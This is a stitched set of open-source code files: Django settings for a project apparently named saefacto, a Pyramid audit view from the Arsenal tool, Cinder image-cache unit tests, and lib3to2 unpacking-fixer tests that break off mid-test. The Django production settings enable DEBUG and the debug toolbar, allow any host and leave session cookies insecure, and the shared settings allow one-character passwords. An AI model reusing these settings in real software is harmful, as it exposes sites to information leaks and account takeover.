########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
"allauth.account.context_processors.account",
"allauth.socialaccount.context_processors.socialaccount",
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
# Your stuff: custom template context processers go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_DIRS = (
join(BASE_DIR, 'templates'),
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
########## END TEMPLATE CONFIGURATION
########## STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
join(BASE_DIR, 'static'),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
########## END STATIC FILE CONFIGURATION
########## MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = join(BASE_DIR, 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
########## END MEDIA CONFIGURATION
########## URL Configuration
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
########## End URL Configuration
########## AUTHENTICATION CONFIGURATION
AUTHENTICATION_BACKENDS = (
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = "username"
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = "mandatory"
ACCOUNT_PASSWORD_MIN_LENGTH = 1
########## END AUTHENTICATION CONFIGURATION
########## Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = "users.User"
LOGIN_REDIRECT_URL = "users:redirect"
########## END Custom user app defaults
########## SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = "slugify.slugify"
########## END SLUGLIFIER
########## LOGGING CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
########## END LOGGING CONFIGURATION
########## Your common stuff: Below this line define 3rd party libary settings
class Local(Common):
########## DEBUG
DEBUG = values.BooleanValue(True)
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## INSTALLED_APPS
INSTALLED_APPS = Common.INSTALLED_APPS
########## END INSTALLED_APPS
########## Mail settings
EMAIL_HOST = "localhost"
EMAIL_PORT = 1025
EMAIL_BACKEND = values.Value('django.core.mail.backends.console.EmailBackend')
########## End mail settings
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
#DATABASES = values.DatabaseURLValue('postgres://localhost/projetosgt')
DATABASES = values.DatabaseURLValue('sqlite:////{0}.sqlite'.format(join(BASE_DIR, 'sae_db')))
########## END DATABASE CONFIGURATION
########## django-debug-toolbar
MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar',)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
'SHOW_TEMPLATE_CONTEXT': True,
}
########## end django-debug-toolbar
########## Your local stuff: Below this line define 3rd party libary settings
#SITETREE_MODEL_TREE = 'sitetree_smartadmin.SmartTree'
SITETREE_MODEL_TREE_ITEM = 'sitetree_smartadmin.SmartTreeItem'
class Production(Common):
########## INSTALLED_APPS
INSTALLED_APPS = Common.INSTALLED_APPS
INSTALLED_APPS += ('allauth.socialaccount.providers.facebook',
'allauth.socialaccount.providers.github', )
########## END INSTALLED_APPS
########## SECRET KEY
SECRET_KEY = values.SecretValue()
########## END SECRET KEY
########## django-secure
INSTALLED_APPS += ("djangosecure", )
# set this to 60 seconds and then to 518400 when you can prove it works
SECURE_HSTS_SECONDS = 60
SECURE_HSTS_INCLUDE_SUBDOMAINS = values.BooleanValue(True)
SECURE_FRAME_DENY = values.BooleanValue(True)
SECURE_CONTENT_TYPE_NOSNIFF = values.BooleanValue(True)
SECURE_BROWSER_XSS_FILTER = values.BooleanValue(True)
SESSION_COOKIE_SECURE = values.BooleanValue(False)
SESSION_COOKIE_HTTPONLY = values.BooleanValue(True)
SECURE_SSL_REDIRECT = values.BooleanValue(True)
########## end django-secure
########## SITE CONFIGURATION
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ["*"]
########## END SITE CONFIGURATION
INSTALLED_APPS += ("gunicorn", )
########## STORAGE CONFIGURATION
# See: http://django-storages.readthedocs.org/en/latest/index.html
INSTALLED_APPS += (
'storages',
)
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
STATICFILES_STORAGE = DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
AWS_ACCESS_KEY_ID = values.SecretValue()
AWS_SECRET_ACCESS_KEY = values.SecretValue()
AWS_STORAGE_BUCKET_NAME = values.SecretValue()
AWS_AUTO_CREATE_BUCKET = True
AWS_QUERYSTRING_AUTH = False
# see: https://github.com/antonagestam/collectfast
AWS_PRELOAD_METADATA = True
INSTALLED_APPS += ("collectfast", )
# AWS cache settings, don't change unless you know what you're doing:
AWS_EXPIREY = 60 * 60 * 24 * 7
AWS_HEADERS = {
'Cache-Control': 'max-age=%d, s-maxage=%d, must-revalidate' % (AWS_EXPIREY,
AWS_EXPIREY)
}
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
########## END STORAGE CONFIGURATION
########## EMAIL
DEFAULT_FROM_EMAIL = values.Value(
'saefacto <[email protected]>')
EMAIL_HOST = values.Value('smtp.sendgrid.com')
EMAIL_HOST_PASSWORD = values.SecretValue(environ_prefix="", environ_name="SENDGRID_PASSWORD")
EMAIL_HOST_USER = values.SecretValue(environ_prefix="", environ_name="SENDGRID_USERNAME")
EMAIL_PORT = values.IntegerValue(587, environ_prefix="", environ_name="EMAIL_PORT")
EMAIL_SUBJECT_PREFIX = values.Value('[saefacto] ', environ_name="EMAIL_SUBJECT_PREFIX")
EMAIL_USE_TLS = True
SERVER_EMAIL = EMAIL_HOST_USER
########## END EMAIL
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_LOADERS = (
('django.template.loaders.cached.Loader', (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)),
)
########## END TEMPLATE CONFIGURATION
########## CACHING
# Only do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows.
try:
# See: https://github.com/rdegges/django-heroku-memcacheify
from memcacheify import memcacheify
CACHES = memcacheify()
except ImportError:
CACHES = values.CacheURLValue(default="memcached://127.0.0.1:11211")
########## END CACHING
########## Your production stuff: Below this line define 3rd party libary settings
########## DEBUG
DEBUG = values.BooleanValue(True)
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## django-debug-toolbar
MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar',)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': ['debug_toolbar.panels.redirects.RedirectsPanel'],
'SHOW_TEMPLATE_CONTEXT': True,
}
########## end django-debug-toolbar
#######################################################################################
# hack terrivelmente feio para fazer o Pycharm identificar as bibliotecas
# o codigo abaixo nunca sera executado
if 1 == 2:
INSTALLED_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# Admin
'django.contrib.admin',
'south', # Database migration helpers:
'crispy_forms', # Form layouts
'avatar', # for user avatars
'sitetree',
'sitetree_smartadmin',
'django_user_agents',
'statici18n', # javascript
'users', # custom users app
'core',
'main',
# Needs to come last for now because of a weird edge case between
# South and allauth
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
########## END APP CONFIGURATION
########## MIDDLEWARE CONFIGURATION
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
########## END MIDDLEWARE CONFIGURATION
########## DEBUG
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
# In production, this is changed to a values.SecretValue() setting
SECRET_KEY = "CHANGEME!!!"
########## END SECRET CONFIGURATION
########## FIXTURE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
join(BASE_DIR, 'fixtures'),
)
########## END FIXTURE CONFIGURATION
########## EMAIL CONFIGURATION
EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend')
########## END EMAIL CONFIGURATION
########## MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
('Fábio C. Barrionuevo da Luz', '[email protected]'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
########## END MANAGER CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
########## END DATABASE CONFIGURATION
########## CACHING
# Do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows.
# memcacheify is what's used in Production
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
########## END CACHING
########## GENERAL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone
TIME_ZONE = 'America/Los_Angeles'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en-us'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
########## END GENERAL CONFIGURATION
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
"allauth.account.context_processors.account",
"allauth.socialaccount.context_processors.socialaccount",
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
# Your stuff: custom template context processers go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_DIRS = (
join(BASE_DIR, 'templates'),
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
########## END TEMPLATE CONFIGURATION
########## STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
join(BASE_DIR, 'static'),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
########## END STATIC FILE CONFIGURATION
########## MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = join(BASE_DIR, 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
########## END MEDIA CONFIGURATION
########## URL Configuration
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
########## End URL Configuration
########## AUTHENTICATION CONFIGURATION
AUTHENTICATION_BACKENDS = (
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = "username"
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = "mandatory"
########## END AUTHENTICATION CONFIGURATION
########## Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = "users.User"
LOGIN_REDIRECT_URL = "users:redirect"
########## END Custom user app defaults
########## SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = "slugify.slugify"
########## END SLUGLIFIER
########## LOGGING CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
########## END LOGGING CONFIGURATION
########## Your common stuff: Below this line define 3rd party libary settings
|
'''Arsenal audit UI.'''
# Copyright 2015 CityGrid Media, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from pyramid.view import view_config
from arsenalweb.views import (
_api_get,
get_authenticated_user,
get_nav_urls,
get_pag_params,
site_layout,
)
LOG = logging.getLogger(__name__)
@view_config(route_name='data_centers_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
@view_config(route_name='hardware_profiles_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
@view_config(route_name='ip_addresses_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
@view_config(route_name='network_interfaces_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
@view_config(route_name='node_groups_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
@view_config(route_name='nodes_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
@view_config(route_name='operating_systems_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
@view_config(route_name='statuses_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
@view_config(route_name='tags_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
def view_all_audit(request):
'''Handle requests for the overall object type audit UI route.'''
page_title_type = 'objects/'
auth_user = get_authenticated_user(request)
(perpage, offset) = get_pag_params(request)
meta = {
'data_centers_audit': {
'page_type': 'Data Centers',
'object_type': 'data_centers',
},
'hardware_profiles_audit': {
'page_type': 'Hardware Profiles',
'object_type': 'hardware_profiles',
},
'ip_addresses_audit': {
'page_type': 'IpAddress',
'object_type': 'ip_addresses',
},
'network_interfaces_audit': {
'page_type': 'NetworkInterface',
'object_type': 'network_interfaces',
},
'nodes_audit': {
'page_type': 'Node',
'object_type': 'nodes',
},
'node_groups_audit': {
'page_type': 'Node Group',
'object_type': 'node_groups',
},
'operating_systems_audit': {
'page_type': 'Operating Systems',
'object_type': 'operating_systems',
},
'statuses_audit': {
'page_type': 'Status',
'object_type': 'statuses',
},
'tags_audit': {
'page_type': 'Tags',
'object_type': 'tags',
},
}
params = meta[request.matched_route.name]
page_title_name = '{0}_audit'.format(params['object_type'])
uri = '/api/{0}_audit'.format(params['object_type'])
payload = {}
for k in request.GET:
payload[k] = request.GET[k]
# Force the UI to 50 results per page
if not perpage:
perpage = 50
payload['perpage'] = perpage
LOG.info('UI requesting data from API={0},payload={1}'.format(uri, payload))
resp = _api_get(request, uri, payload)
total = 0
objects_audit = []
if resp:
total = resp['meta']['total']
objects_audit = resp['results']
nav_urls = get_nav_urls(request.path, offset, perpage, total, payload)
# Used by the columns menu to determine what to show/hide.
column_selectors = [
{'name': 'created', 'pretty_name': 'Date Created'},
{'name': 'field', 'pretty_name': 'Field'},
{'name': 'new_value', 'pretty_name': 'New Value'},
{'name': 'node_audit_id', 'pretty_name': 'Audit ID'},
{'name': 'object_id', 'pretty_name': '{0} ID'.format(params['page_type'])},
{'name': 'old_value', 'pretty_name': 'Old Value'},
{'name': 'updated_by', 'pretty_name': 'Updated By'},
]
return {
'au': auth_user,
'column_selectors': column_selectors,
'layout': site_layout('max'),
'nav_urls': nav_urls,
'objects_audit': objects_audit,
'offset': offset,
'page_title_name': page_title_name,
'page_title_type': page_title_type,
'params': params,
'perpage': perpage,
'total': total,
}
|
# Copyright (C) 2015 Pure Storage, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from datetime import timedelta
import ddt
import mock
from oslo_utils import timeutils
from cinder import context as ctxt
from cinder.db.sqlalchemy import models
from cinder.image import cache as image_cache
from cinder import objects
from cinder import test
from cinder.tests.unit import fake_constants as fake
@ddt.ddt
class ImageVolumeCacheTestCase(test.TestCase):
def setUp(self):
super(ImageVolumeCacheTestCase, self).setUp()
self.mock_db = mock.Mock()
self.mock_volume_api = mock.Mock()
self.context = ctxt.get_admin_context()
self.volume = models.Volume()
vol_params = {'id': fake.VOLUME_ID,
'host': 'foo@bar#whatever',
'cluster_name': 'cluster',
'size': 0}
self.volume.update(vol_params)
self.volume_ovo = objects.Volume(self.context, **vol_params)
def _build_cache(self, max_gb=0, max_count=0):
cache = image_cache.ImageVolumeCache(self.mock_db,
self.mock_volume_api,
max_gb,
max_count)
cache.notifier = self.notifier
return cache
def _build_entry(self, size=10):
entry = {
'id': 1,
'host': 'test@foo#bar',
'cluster_name': 'cluster@foo#bar',
'image_id': 'c7a8b8d4-e519-46c7-a0df-ddf1b9b9fff2',
'image_updated_at': timeutils.utcnow(with_timezone=True),
'volume_id': '70a599e0-31e7-49b7-b260-868f441e862b',
'size': size,
'last_used': timeutils.utcnow(with_timezone=True)
}
return entry
def test_get_by_image_volume(self):
cache = self._build_cache()
ret = {'id': 1}
volume_id = '70a599e0-31e7-49b7-b260-868f441e862b'
self.mock_db.image_volume_cache_get_by_volume_id.return_value = ret
entry = cache.get_by_image_volume(self.context, volume_id)
self.assertEqual(ret, entry)
self.mock_db.image_volume_cache_get_by_volume_id.return_value = None
entry = cache.get_by_image_volume(self.context, volume_id)
self.assertIsNone(entry)
def test_evict(self):
cache = self._build_cache()
entry = self._build_entry()
cache.evict(self.context, entry)
self.mock_db.image_volume_cache_delete.assert_called_once_with(
self.context,
entry['volume_id']
)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.evict', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(entry['host'], msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
@ddt.data(True, False)
def test_get_entry(self, clustered):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': entry['image_updated_at']
}
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = entry
if not clustered:
self.volume_ovo.cluster_name = None
expect = {'host': self.volume.host}
else:
expect = {'cluster_name': self.volume.cluster_name}
found_entry = cache.get_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
self.assertDictEqual(entry, found_entry)
(self.mock_db.
image_volume_cache_get_and_update_last_used.assert_called_once_with)(
self.context,
entry['image_id'],
**expect
)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.hit', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(entry['host'], msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
def test_get_entry_not_exists(self):
cache = self._build_cache()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': timeutils.utcnow(with_timezone=True)
}
image_id = 'c7a8b8d4-e519-46c7-a0df-ddf1b9b9fff2'
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = None
found_entry = cache.get_entry(self.context,
self.volume_ovo,
image_id,
image_meta)
self.assertIsNone(found_entry)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.miss', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(self.volume.host, msg['payload']['host'])
self.assertEqual(image_id, msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
@mock.patch('cinder.objects.Volume.get_by_id')
def test_get_entry_needs_update(self, mock_volume_by_id):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': entry['image_updated_at'] + timedelta(hours=2)
}
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = entry
mock_volume = mock.MagicMock()
mock_volume_by_id.return_value = mock_volume
found_entry = cache.get_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
# Expect that the cache entry is not returned and the image-volume
# for it is deleted.
self.assertIsNone(found_entry)
self.mock_volume_api.delete.assert_called_with(self.context,
mock_volume)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.miss', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(self.volume.host, msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
def test_create_cache_entry(self):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'updated_at': entry['image_updated_at']
}
self.mock_db.image_volume_cache_create.return_value = entry
created_entry = cache.create_cache_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
self.assertEqual(entry, created_entry)
self.mock_db.image_volume_cache_create.assert_called_once_with(
self.context,
self.volume_ovo.host,
self.volume_ovo.cluster_name,
entry['image_id'],
entry['image_updated_at'].replace(tzinfo=None),
self.volume_ovo.id,
self.volume_ovo.size
)
def test_ensure_space_unlimited(self):
cache = self._build_cache(max_gb=0, max_count=0)
has_space = cache.ensure_space(self.context, self.volume)
self.assertTrue(has_space)
self.volume.size = 500
has_space = cache.ensure_space(self.context, self.volume)
self.assertTrue(has_space)
def test_ensure_space_no_entries(self):
cache = self._build_cache(max_gb=100, max_count=10)
self.mock_db.image_volume_cache_get_all.return_value = []
self.volume_ovo.size = 5
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.volume_ovo.size = 101
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertFalse(has_space)
def test_ensure_space_need_gb(self):
cache = self._build_cache(max_gb=30, max_count=10)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=12)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
entry3 = self._build_entry(size=10)
entries.append(entry3)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 15
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(2, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
mock_delete.assert_any_call(self.context, entry3)
def test_ensure_space_need_count(self):
cache = self._build_cache(max_gb=30, max_count=2)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=10)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 12
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(1, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
def test_ensure_space_need_gb_and_count(self):
cache = self._build_cache(max_gb=30, max_count=3)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=10)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
entry3 = self._build_entry(size=12)
entries.append(entry3)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 16
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(2, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
mock_delete.assert_any_call(self.context, entry3)
def test_ensure_space_cant_free_enough_gb(self):
cache = self._build_cache(max_gb=30, max_count=10)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = list(self._build_entry(size=25))
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 50
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertFalse(has_space)
mock_delete.assert_not_called()
|
from test_all_fixers import lib3to2FixerTestCase
class Test_unpacking(lib3to2FixerTestCase):
fixer = u'unpacking'
def test_unchanged(self):
s = u"def f(*args): pass"
self.unchanged(s)
s = u"for i in range(s): pass"
self.unchanged(s)
s = u"a, b, c = range(100)"
self.unchanged(s)
def test_forloop(self):
b = u"""
for a, b, c, *d, e in two_dim_array: pass"""
a = u"""
for _3to2iter in two_dim_array:
_3to2list = list(_3to2iter)
a, b, c, d, e, = _3to2list[:3] + [_3to2list[3:-1]] + _3to2list[-1:]
pass"""
self.check(b, a)
b = u"""
for a, b, *c in some_thing:
do_stuff"""
a = u"""
for _3to2iter in some_thing:
_3to2list = list(_3to2iter)
a, b, c, = _3to2list[:2] + [_3to2list[2:]]
do_stuff"""
self.check(b, a)
b = u"""
for *a, b, c, d, e, f, g in some_thing:
pass"""
a = u"""
for _3to2iter in some_thing:
_3to2list = list(_3to2iter)
a, b, c, d, e, f, g, = [_3to2list[:-6]] + _3to2list[-6:]
pass"""
self.check(b, a)
def test_assignment(self):
b = u"""
a, *b, c = range(100)"""
a = u"""
_3to2list = list(range(100))
a, b, c, = _3to2list[:1] + [_3to2list[1:-1]] + _3to2list[-1:]"""
self.check(b, a)
b = u"""
a, b, c, d, *e, f, g = letters"""
a = u"""
_3to2list = list(letters)
a, b, c, d, e, f, g, = _3to2list[:4] + [_3to2list[4:-2]] + _3to2list[-2:]"""
self.check(b, a)
b = u"""
*e, f, g = letters"""
a = u"""
_3to2list = list(letters)
e, f, g, = [_3to2list[:-2]] + _3to2list[-2:]"""
self.check(b, a)
b = u"""
a, b, c, d, *e = stuff"""
a = u"""
_3to2list = list(stuff)
a, b, c, d, e, = _3to2list[:4] + [_3to2list[4:]]"""
self.check(b, a)
b = u"""
*z, = stuff"""
a = u"""
_3to2list = list(stuff)
z, = [_3to2list[:]]"""
self.check(b, a)
b = u"""
while True:
a, *b, c = stuff
